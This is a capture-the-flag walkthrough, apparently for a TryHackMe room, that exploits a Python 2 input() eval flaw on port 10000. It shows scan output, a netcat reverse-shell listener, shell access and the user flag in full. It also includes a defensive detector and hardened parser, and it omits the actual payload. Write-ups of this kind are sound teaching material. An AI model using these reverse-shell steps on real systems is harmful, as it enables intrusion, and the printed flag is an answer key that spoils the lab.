user.txt
We start right away with an Nmap scan, which reveals 2 open ports: SSH running on port 22 and an unknown process on port 10000.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 78:c4:40:84:f4:42:13:8e:79:f8:6b:e4:6d:bf:d4:46 (RSA)
| 256 25:9d:f3:29:a2:62:4b:24:f2:83:36:cf:a7:75:bb:66 (ECDSA)
|_ 256 e7:a0:07:b0:b9:cb:74:e9:d6:16:7d:7a:67:fe:c1:1d (ED25519)
10000/tcp open snet-sensor-mgmt?
| fingerprint-strings:
| GenericLines:
| Private 0days
| Please enther number of exploits to send??: Traceback (most recent call last):
| File "./exploit.py", line 6, in <module>
| num_exploits = int(input(' Please enther number of exploits to send??: '))
| File "<string>", line 0
| SyntaxError: unexpected EOF while parsing
| GetRequest:
| Private 0days
| Please enther number of exploits to send??: Traceback (most recent call last):
| File "./exploit.py", line 6, in <module>
| num_exploits = int(input(' Please enther number of exploits to send??: '))
| File "<string>", line 1, in <module>
| NameError: name 'GET' is not defined
| HTTPOptions, RTSPRequest:
| Private 0days
| Please enther number of exploits to send??: Traceback (most recent call last):
| File "./exploit.py", line 6, in <module>
| num_exploits = int(input(' Please enther number of exploits to send??: '))
| File "<string>", line 1, in <module>
| NameError: name 'OPTIONS' is not defined
| NULL:
| Private 0days
|_ Please enther number of exploits to send??:
If we try to connect to port 10000 with a browser, it returns an error showing that the hidden program is called exploit.py.
This is the error:
Please enther number of exploits to send??: Traceback (most recent call last):
File "./exploit.py", line 6, in <module>
num_exploits = int(input(' Please enther number of exploits to send??: '))
File "<string>", line 1, in <module>
NameError: name 'GET' is not defined
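The File "<string>" frame in this traceback means the text sent to the port was evaluated as Python, which is what Python 2's input() does (it is eval(raw_input())). The block below is an added example, not code from the room or from exploit.py: it flags that pattern in a captured banner and shows a digits-only parser as the fix (raw_input() plays that role on Python 2); the function names and the 1-100 limit are assumptions.

```python
import re

# Banner text copied from the GetRequest probe in the scan output above
# (Nmap's leading "| " removed).
GET_BANNER = """Private 0days
Please enther number of exploits to send??: Traceback (most recent call last):
File "./exploit.py", line 6, in <module>
num_exploits = int(input(' Please enther number of exploits to send??: '))
File "<string>", line 1, in <module>
NameError: name 'GET' is not defined
"""
# Banner from the NULL probe: a prompt only, no traceback.
NULL_BANNER = "Private 0days\nPlease enther number of exploits to send??:\n"

FRAME = re.compile(r'File "(?P<file>[^"]+)", line (?P<line>\d+)')
ERROR = re.compile(r'^(?P<exc>NameError|SyntaxError): (?P<msg>.*)$', re.M)


def eval_input_evidence(banner):
    """Return details if the banner shows network input being evaluated as code.

    Evaluated text appears in a Python traceback as a frame whose file
    name is "<string>", followed by a NameError or SyntaxError.
    """
    frames = FRAME.findall(banner)
    error = ERROR.search(banner)
    if not error or not any(name == "<string>" for name, _ in frames):
        return None
    script = next((f for f in frames if f[0] != "<string>"), None)
    return {"script": script[0] if script else None,
            "line": int(script[1]) if script else None,
            "exception": error.group("exc"),
            "calls_input": "input(" in banner}


def read_count(raw, maximum=100):
    """Hardened replacement for int(input(...)): parse digits, never evaluate.

    The upper bound (maximum) is an assumption added for this example.
    """
    text = raw.strip()
    if not re.fullmatch(r"[0-9]{1,4}", text):
        raise ValueError("expected a whole number")
    value = int(text)
    if not 1 <= value <= maximum:
        raise ValueError("count out of range")
    return value
```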
We connect with telnet; the Python script asks for a number and runs a sort of ** ping, where "**" is the number we supplied.
$ telnet 10.10.135.158 10000
Trying 10.10.135.158...
Connected to 10.10.135.158.
Escape character is '^]'.
Private 0days
Please enther number of exploits to send??: 4
Exploit started, attacking target (tryhackme.com)...
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.064 ms
Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.032 ms
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.023 ms
Exploiting tryhackme internal network: beacons_seq=2 ttl=1337 time=0.164 ms
Connection closed by foreign host.
On the VM (provided by the site), the listener gets a response and we have a reverse shell:
unknown@parrot:/data/vpn$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.9.0.54] from (UNKNOWN) [10.10.135.158] 38628
SHELL=/bin/bash script -q /dev/null
king@ubuntu:~$
We open the file and get the flag:
king@ubuntu:~$ ls -la
ls -la
total 324
drwxr-xr-x 4 king king 4096 Aug 27 2019 .
drwxr-xr-x 3 root root 4096 Aug 25 2019 ..
-rw------- 1 root root 2929 Aug 27 2019 .bash_history
-rw-r--r-- 1 king king 220 Aug 25 2019 .bash_logout
-rw-r--r-- 1 king king 3771 Aug 25 2019 .bashrc
drwx------ 2 king king 4096 Aug 25 2019 .cache
-rwxrwxrwx 1 king king 272113 Aug 27 2019 credentials.png
-rwxrwxrwx 1 king king 408 Aug 25 2019 exploit.py
drwxrwxr-x 2 king king 4096 Aug 25 2019 .nano
-rw-rw-r-- 1 king king 5 Jul 2 11:25 .pid
-rw-r--r-- 1 king king 655 Aug 25 2019 .profile
-rw-r--r-- 1 root root 32 Aug 25 2019 root.sh
-rw-rw-r-- 1 king king 139 Aug 25 2019 run.sh
-rw-r--r-- 1 king king 0 Aug 25 2019 .sudo_as_admin_successful
-rw-rw-r-- 1 king king 33 Aug 27 2019 user.txt
-rw-r--r-- 1 root root 183 Aug 25 2019 .wget-hsts
king@ubuntu:~$ cat user.txt
cat user.txt
cf85ff769cfaaa721758949bf870b019
USER FLAG: cf85ff769cfaaa721758949bf870b019